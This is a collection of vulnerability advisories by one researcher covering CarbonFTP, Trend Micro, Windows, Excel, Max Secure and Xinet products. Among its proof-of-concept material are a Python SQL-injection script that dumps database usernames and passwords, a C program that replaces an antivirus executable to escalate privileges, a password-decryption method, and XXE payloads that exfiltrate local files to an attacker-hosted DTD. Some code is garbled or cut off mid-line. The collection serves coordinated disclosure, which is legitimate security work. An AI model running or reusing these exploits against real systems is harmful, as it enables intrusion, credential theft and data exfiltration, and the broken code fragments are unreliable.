Neowise CarbonFTP v1.4 Insecure Proprietary Password Encryption CVE-2020-6857

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
 

[Vendor]
www.neowise.com


[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that enables you to synch local files 
with a remote FTP server and vice versa.
It provides a step-by-step wizard to select the folders to be synchronized, the 
direction of the synchronization and option
to set file masks to limit the transfer to specific file types. Your settings 
can be saved as projects, so they can be
quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8


[Vulnerability Type]
Insecure Proprietary Password Encryption


[CVE Reference]
CVE-2020-6857


[Affected Component]
Password Encryption


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded 
weak encryption key.
The key for locally stored FTP server passwords is hard-coded in the binary. 
Passwords encoded as hex
are coverted to decimal which is then computed by adding the key "97F" to the 
result. The key 97F seems
to be the same for all executables across all systems. Finally, passwords are 
stored as decimal values.

If a user chooses to save the project the passwords are stored in ".CFTP" local 
configuration files.
They can be found under 
"C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.

Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360=   a
27520 27617 27617 27617 27617=   b
27266 27616 27360 27361 27616=   aab
27521 27616 27616 27616 27616=   ba

Password encryption/decryption is as follows.

Encryption process example.
484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, the value 20939 would then represent the ascii characters 
"HL".

To decrypt we just perform the reverse of the operation above.
20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ascii to retrieve the plaintext password 
of "HL".

CarbonFTP passwords less than nine characters are padded using chars from the 
current password up until
reaching a password length of nine bytes.

The two char password "XY" in encrypted form "2496125048250482504825048" is 
padded with "XY" until reaching a length
of nine bytes "XYXYXYXYX".

Similarly, the password "HELL" is "2086721956209392195620939" and again is 
padded since its length is less than nine bytes. 

Therefore, we will get several cracked password candidates like: "HELLHELL | 
HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"
However, the longer the password the easier it becomes to crack them, as we can 
decrypt passwords in one
shot without having several candidates to choose from with one of them being 
the correct password.

Therefore, "LONGPASSWORD!" is stored as the encrypted string 
"219042273422734224782298223744247862350210947"
and because it is greater than nine bytes it is cracked without any candidate 
passwords returned.

>From offset 0047DA6F to 0047DAA0 is the loop that performs the password 
>decryption process.
Using the same password "HELL" as example.

BPX @47DA6F

0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] 
  |
0047DA72 | 50   | push eax  
  |
0047DA73 | B9 05 00 00 00   | mov ecx,5 
  |
0047DA78 | 8B D3| mov edx,ebx   
  |
0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4]  
  | [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF   | call carbonftp.404678 
  |
0047DA82 | 83 C3 05 | add ebx,5 
  |
0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] 
  | [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF   | call carbonftp.40883C 
  |
0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8]  
  | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax  
  |
0047DA93 | 83 C6 02 | add esi,2 
  |
0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4]

Trend Micro Security 2019 (Consumer) Multiple Products Security Bypass Protected Service Tampering CVE-2019-19697

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt
[+] ISR: ApparitionSec  


[Vendor]
www.trendmicro.com


[Product]
Trend Micro Security 2019 (Consumer) Multiple Products


Trend Micro Security provides comprehensive protection for your devices.
This includes protection against ransomware, viruses, malware, spyware, and 
identity theft.


[Vulnerability Type]
Security Bypass Protected Service Tampering


[CVE Reference]
CVE-2019-19697


[Security Issue]
Trend Micro Maximum Security is vulnerable to arbitrary code execution as it 
allows for creation of registry key to target a process running as SYSTEM.
This can allow a malware to gain elevated privileges to take over and shutdown 
services that require SYSTEM privileges like Trend Micros "Asmp"
service "coreServiceShell.exe" which does not allow Administrators to tamper 
with them.

This could allow an attacker or malware to gain elevated privileges and tamper 
with protected services by disabling or otherwise preventing them to start.
Note administrator privileges are required to exploit this vulnerability.


[CVSS 3.0 Scores: 3.9]


[Affected versions]
Platform Microsoft Windows
Premium Security 2019 (v15)
Maximum Security 2019 (v15)
Internet Security 2019 (v15)
Antivirus + Security 2019 (v15)


[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx


[Exploit/POC]
1) Create a entry for the following registry key targeting "PtWatchdog.exe" and 
set the debugger string value to an arbitrary executable to gain SYSTEM privs.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options\PtWatchdog.exe

2) Create a string named "debugger" under the reg key and give it the value of 
the executable you wish to run as SYSTEM.

3) Restart the machine or wait until service is restart then you get SYSTEM and 
can now disable Trend Micro endpoint security coreServiceShell.exe service


[Network Access]
Local


[Severity]
Low


[Disclosure Timeline]
Vendor Notification: October 8, 2019
Vendor confirms issue: October 28, 2019
Vendor release date: January 14, 2020
January 16, 2020 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Trend Micro Security (Consumer) Multiple Products Persistent Arbitrary Code Execution CVE-2019-20357

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec 
 

[Vendor]
www.trendmicro.com


[Product(s)]
Trend Micro Security (Consumer) Multiple Products


Trend Micro Security provides comprehensive protection for your devices.
This includes protection against ransomware, viruses, malware, spyware, and 
identity theft.


[Vulnerability Type]
Persistent Arbitrary Code Execution


[CVE Reference]
CVE-2019-20357


[CVSSv3 Scores: 6.7]


[Security Issue]
Trend Micro Security can potentially allow an attackers to use a malicious 
program to escalate privileges
to SYSTEM integrity and attain persistence on a vulnerable system.


[Product Affected Versions]
Platform Microsoft Windows

Premium Security 2019 (v15) and 2020 (v16)

Maximum Security
2019 (v15) and 2020 (v16)

Internet Security
2019 (v15) and 2020 (v16)

Antivirus + Security
2019 (v15) and 2020 (v16)


[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx

[Exploit/POC]
Compile C test code "Program.c"

void main(void){
 puts("Done!");
 system("pause");
}

1) Place under c:\ dir.
2) Reboot the machine, the coreServiceShell.exe service loads and executes our 
binary with SYSTEM integrity.



[Network Access]
Local


[Severity]
Medium



[Disclosure Timeline]
Vendor Notification: October 8, 2019
vendor advisory: January 15, 2020
January 16, 2020 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Windows .Group File / URL Field Code Execution

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] apparitionsec@gmail
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
Windows ".Group" File Type

Gorup files are a collection of contacts created by Windows Contacts, an 
embedded contact management program included with Windows.
It contains a list of contacts saved into a group; which can be used to create 
a mailing list for sending email
messages to multiple addresses at once.


[Vulnerability Type]
URL Field Code Execution


[CVE Reference]
N/A


[Security Issue]
Windows ".group" files are related to Contact files and suffer from unexpected 
code execution when clicking the "Contact Group Details"
tab Website Go button. This happens if the website URL field points to an 
executable file. This is the same type of vulnerability
affecting Windows .contact files that remains unfixed as of the time of this 
writing and has a metasploit module available.

[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Therefore, attacker supplied executables can run unexpected to the user, who 
thinks they visit a website when click the Website go button.
Moreover, if files are compressed using certain archive utilities it may be 
possible to skirt security warnings even when the executable is
internet downloaded or copied from network share.

This exploit requires a bit more user interaction than the previously disclosed 
.contact file vulnerability, as the GROUP file will complain
if not in the Contacts directory. Advisory released for the sake of 
completeness and user security awareness.


[Exploit/POC]
1) create a Windows .group file

2) create a directory named "http"

3) create an executable file with a .com ext (change .exe to .com) like 
www.microsoft.com an place it in the "http" dir alongside .group file.

4) point the website URL to the executable using path traversal like 
"http.\www.microsoft.com" which is the website address in the .group file.

Note: the directory traversal can also point to other dirs like  
..\Downloads\http.\microsoft.com but downside is the URL looks very sketchy.

5) package it up in an archive .rar etc.

6) send the .group file via email, or download it and lure the user to place 
the archive in the "c:\User\\Contacts" directory.

7) open the archive and double click the .group file (Windows will complain 
with an error to move to the contacts folder
   if not within that dir already) next click the website address go button.

The attackers executable will run instead of navigating to a website as would 
be expected by an end user.


[Severity]
High


[Disclosure Timeline]
Vendor Notification: Same type vuln affecting .contact files disclosed January 
16, 2019, status remains unfixed.
January 1, 2020 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Windows Media Center XXE MotW Bypass (Anniversary Edition)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security 
 

[Vendor]
www.microsoft.com


[Product]
Microsoft Windows Media Center

Windows Media Center is a discontinued digital video recorder and media player 
created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media Center.


[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)


[CVE Reference]
N/A


[Security Issue]
This vulnerability was originally released by me back on December 4, 2016, yet 
remains unfixed.
Now, to make matters worse I will let you know "mark-of-the-web" MotW does not 
matter here, its just ignored.
Meaning, if the .MCL file is internet downloaded it gets the MOTW but files 
still exfiltrated. 

Therefore, I am releasing this "anniversary edition" XXE with important motw 
informations.

This is a fully working remote information disclosure vulnerability that still 
affects Windows 7.
Windows 7 is near end of life this January, yet it is still used by many 
organizations.
Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center 
but I have not tested it.

Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server 
Port 80 etc...
Download the ".mcl" file using Microsoft Internet Explorer.

Check the MotW where you downloaded the .mcl file dir /r and note the 
Zone.Identifier:$DATA exists.
Open the file and BOOM! watch shitz leaving!... still vulnerable after all 
these years lol.

OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro


[Exploit/POC]
1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"

# PoC


/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>


2) "FindMeThatBiotch.dtd"
/%data666;'>">


3) Auto exploit PHP .mcl file downloader.

/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary"); 
header("Content-disposition: attachment; filename=\"" . basename($url) . "\""); 
readfile($url);
?>


4) python -m SimpleHTTPServer 80



[POC Video URL]
https://www.youtube.com/watch?v=zcrATpBNAZ0


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification:  December 4, 2016
MSRC "wont fix"
Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 Pre-Auth SQL Injection 0Day CVE-2019-19245

[apparitionsec]

[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.napc.com


[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web based interface for xinet asset management solution.


[Vulnerability Type]
Pre-Auth SQL Injection


[CVE Reference]
CVE-2019-19245


[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows 
Pre-Authentication Error based SQL Injection via the /elegant6/login 
LoginForm[username] field when
double quotes are used. The vulnerable version seems to be old, but it may 
still be possible to still find it deployed as I have.

Vulnerable Parameter: LoginForm[username] (POST) Method.


[Exploit/POC]
import requests,time,re,sys,argparse

#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: 
LoginForm[password]=[rememberMe]=0[username]=SQL
#SQL INJECTION VULN PARAM --> LoginForm[username]
#

IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False


def vuln_ver_chk():
global IP, PORT
TARGET = "http://"+IP+":"+PORT+"/elegant6/login;
response = requests.get(TARGET)
if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
print "[+] Found vulnerable NAPC Elegant 6 Asset Library version 
6.1.655."
return True
print "[!] Version not vulnerable :("
return False


def sql_inject_request(SQL):

global IP, PORT
URL = "http://"+IP+":"+PORT+"/elegant6/login;

tmp=""
headers = {'User-Agent': 'Mozilla/5.0'}
payload = 
{'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
session = requests.Session()

res = session.post(URL,headers=headers,data=payload)
idx = res.content.find('CDbCommand')  # Start of SQL Injection Error in 
response
idx2 = res.content.find('key 1')  # End of SQL Injection Error in 
response

return res.content[idx : idx2+3]



#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
global k,j
while j < NUM_INJECTS:
j+=1
if k !=1:
k+=1
return str(j)+','+str(k)


def tidy_up(results):
global CREDS
idx = results.find("'")
if idx != -1:
idx2 = results.rfind("'")
if not CREDS:
return results[idx + 1: idx2 -2]
else:
return results[idx + 2: idx2]



def breach(i):
global k,j,NUM_INJECTS,SHOW_SQL_ERROR
result=""

#Dump Usernames & Passwords
if CREDS:
if i % 2 == 0:
target='username'
else:
target='password'

SQL=('"and (select 1 from(select count(*),concat((select(select 
concat(0x2b,'+target+'))'
'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group 
by x)a)-- -')

if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL)+"\n"
print "[+] Dumping "+target+": "+result

#Dump Tables
if TABLES:
while j < NUM_INJECTS:
nums = inc()
SQL=('"and (select 1 from (Select count(*),Concat((select 
table_name from information_schema.tables where table_schema=database()'
'limit '+nums+'),0x3a,floor(rand(0)*2))y from 
information_schema.tables group by y) x)-- -')

if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL) + "\n"

print "[+] Dumping Table... " +result
time.sleep(0.3)

  

def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip_address", help=".")
parser.add_argument("-p", "--port", help="Port, Default is 80")
parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump 
Database Tables.")
parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump 
Database Credentials.")
parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max 
SQL Injection Attempts, Default is 20.")
parser.add_argument("-s", "--show_sql_errors", nargs="?", const=&quo

Max Secure Anti Virus Plus v19.0.4.020 Insecure Permissions CVE-2019-19382

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.maxpcsecure.com


[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020

File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-19382


[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the 
installation directory.
Local attackers or malware running at low integrity can replace a .exe or .dll 
file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated 
Users:(ID)F
   BUILTIN\Users:(ID)F
   NT AUTHORITY\SYSTEM:(ID)F
   BUILTIN\Administrators:(ID)F


[Affected Component]
Permissions on installation directory


[Exploit/POC]
#include 
#include 
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & 
FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){
   
  if(!FileExists(DISABLED_TARGET)){
CopyFile(TARGET, TMP, FALSE);
Sleep(1000);
CopyFile(TMP, DISABLED_TARGET, FALSE);
printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
Sleep(1000);
printf("[+] Disabled MaxSDUI.exe ...\n");
Sleep(300);
   }else{
 PWNED=TRUE;
   }
   
if(!PWNED){
char fname[MAX_PATH];
char newLoc[]=TARGET;
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
   if (size){
 printf("[+] Copying exploit to vuln dir...\n");
 Sleep(1000);
 CopyFile(fname, TARGET, FALSE);
 printf("[+] Replaced legit Max Secure EXE...\n");
 Sleep(2000);
 printf("[+] Done!\n");
 MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus 
Plus\\MaxPwn.lnk");
 Sleep(1000);
 exit(0);
}
}else{
if(FileExists(TMP)){
 remove(TMP);
}
printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
printf("[+] hyp3rlinx\n");
system("pause");
 }
}


[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Excel 2016 v1901 Import Error XML External Entity Injection

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
Excel 2016 v1901

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, 
Android and iOS.
It features calculation, graphing tools, pivot tables, and a macro programming 
language called Visual Basic for Applications. 


[CVE]
N/A


[Vulnerability Type]
Error Import Based XML External Entity Injection


[Security Issue]
Excel query from file feature is vulnerable to "Error" based XML External 
Entity attacks, if the user chooses the "Import as
Html page" functionality upon receiving errors importing a specially crafted 
XML file.

This can result in potential remote data exfiltration, user interaction is 
required to exploit this vulnerability.

Tested successfuly Windows 10 .NET framework version v4.0.30319.

C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319


[Exploit/POC]
Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From 
File/From XML'

1) You will get error like: 

"Error:

Unable to connect

We encountered an error while trying to connect.

The user will then get an option to 'Edit' where they can import the file as an 
HTML file

Result Local data can be exfiltrated to remote server"

2) Excel will then give you option to 'Edit' and import as 'Html Page' from the 
drop down menu in Excel

User has choose to import as HTML then XXE attack will succeed:

e.g.

127.0.0.1 - - [05/Mar/2019 15:31:16] "GET 
/?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO
/1.1" 200 -


Malicious XML file to load as New Data Query

"test.xml"



http://127.0.0.1:8000/payload.dtd'>
%dtd;]>




[Network Access]
Local


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security 
Release.
Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Trend Micro Anti-Threat Toolkit <= v1.62.0.1218 / Remote Code Execution 0day

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Apparition Security  
 

[Vendor]
www.trendmicro.com


[Product]
Trend Micro Anti-Threat Toolkit (ATTK)
1.62.0.1218 and below

Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean 
infections.
It can be used to perform system forensic scans and clean the following 
infection types:

General malware infection
Master boot record Infection
CIDOX/ RODNIX infection
Rootkit infection
Zbot infection
Cryptolocker infection
etc..


[Vulnerability Type]
Remote Code Execution


[CVE Reference]
CVE-2019-9491


[Security Issue]
Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE 
files if a malware author
happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" 
and the malware can be
placed in the vacinity of the ATTK when a scan is launched by the end user.

Since the ATTK is signed by verified publisher and therefore assumed trusted 
any MOTW security warnings
are bypassed if the malware was internet downloaded, also it can become a 
persistence mechanism as
each time the Anti-Threat Toolkit is run so can an attackers malware.

Standalone affected components of ATTK and other integrations (e.g. WCRY Patch 
Tool, OfficeScan Toolbox, etc.)

attk_collector_cli_x64.exe 
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed


[References]
https://success.trendmicro.com/solution/000149878
*All versions of the ATTK have been updated with the newer version. Anti-Threat 
Toolkit (ATTK) 1.62.0.1223


[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or 
"regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file 
get loaded and executed.

#include 

void main(void){
   puts("Trend Micro Anti-Threat Toolkit PWNED!");
   puts("Discovery: hyp3rlinx");
   puts("CVE-2019-9491\n");
   WinExec("powershell", 0);
}


[POC Video URL]
https://www.youtube.com/watch?v=HBrRVe8WCHs


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: September 9, 2019
Vendor confirms vulnerability: September 25, 2019
Vendor requests to coordinate advisory: September 25, 2019
October 19, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

NtFileSins v2.1 Windows NTFS Privileged File Access Enumeration Tool

[apparitionsec]

from subprocess import Popen, PIPE
import sys,argparse,re

# NtFileSins v2.1
# Fixed: save() logic to log report in case no Zone.Identifiers found.
# Added: Check for Zone.Identifer:$DATA to see if any identified files were 
downloaded from internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access 
Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by 
another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe 
shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#   2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an 
internal or external command,
# operable program or batch file" = Admin to Admin so this script is not 
required.
#
# Profile other users by compare ntfs error messages to potentially learn their 
activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with 
user-only rights.
#
#==#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1   #
# By John Page (aka hyp3rlinx) #
# Apparition Security  #
#==#

BANNER='''
_   ___ ___ _   
   / | / /_  __/ (_) /__ / ___/(_)___  _
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  ) 
/_/ |_/ /_/ /_/   /_/_/\___//_/_/ /_//  v2.1
 
 By hyp3rlinx
 ApparitionSec  
   
'''  

sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My 
Documents","Searches","Videos/Captures",
   
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = 
set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3",
 ".bat",
  
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
print "NtFileSins is a privileged file access enumeration tool to search 
multi-account artifacts without admin rights.\n"
print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
print '-u victim -a ""'
print "-u victim -d Downloads -a  -s"
print '-u victim -d Contacts -a "Mike N.contact"'
print "-u victim -a APT.txt -b -n"
print "-u victim -d -z Desktop/MyFiles -a  <.name>"
print "-u victim -d Searches -a .search-ms"
print "-u victim -d . -a "
print "-u victim -d desktop -a inverted-crosses.mp3 -b"
